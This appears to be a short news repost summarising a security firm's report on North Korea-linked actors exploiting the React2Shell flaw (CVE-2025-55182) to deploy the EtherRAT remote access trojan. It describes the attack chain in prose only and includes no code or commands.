"Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical security React2Shell flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT. "EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org," Sysdig said in a report published Monday."
"The cloud security firm said the activity exhibits significant overlap with a long-running campaign codenamed Contagious Interview, which has been observed leveraging the EtherHiding technique to distribute malware since February 2025. Contagious Interview is the name given to a series of attacks in which blockchain and Web3 developers, among others, are targeted through fake job interviews, coding assignments, and video assessments, leading to the deployment of malware."
"The attack chain commences with the exploitation of CVE-2025-55182 (CVSS score: 10.0), a maximum-severity security vulnerability in RSC, to execute a Base64-encoded shell command that downloads and runs a shell script responsible for deploying the main JavaScript implant. The shell script is retrieved using a curl command, with wget and python3 used as fallbacks. It is also designed to prepare the environment by downloading Node.js v20.10.0 from nodejs.org, following which it writes to disk an encrypted blob and an obfuscated JavaScript dropper."
Operators linked to North Korea exploited the React2Shell (RSC) vulnerability CVE-2025-55182 to deploy EtherRAT, a previously undocumented remote access trojan. EtherRAT leverages Ethereum smart contracts for command-and-control resolution, implements five independent Linux persistence mechanisms, and downloads its own Node.js runtime. The activity overlaps with the Contagious Interview campaign, which targets blockchain and Web3 developers via fake job interviews, coding assignments, and video assessments and has used EtherHiding to distribute malware since February 2025. The attack chain executes a Base64-encoded shell command to fetch a shell script (curl with wget/python3 fallbacks) that downloads Node.js v20.10.0 and writes an encrypted blob and an obfuscated JavaScript dropper to disk.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]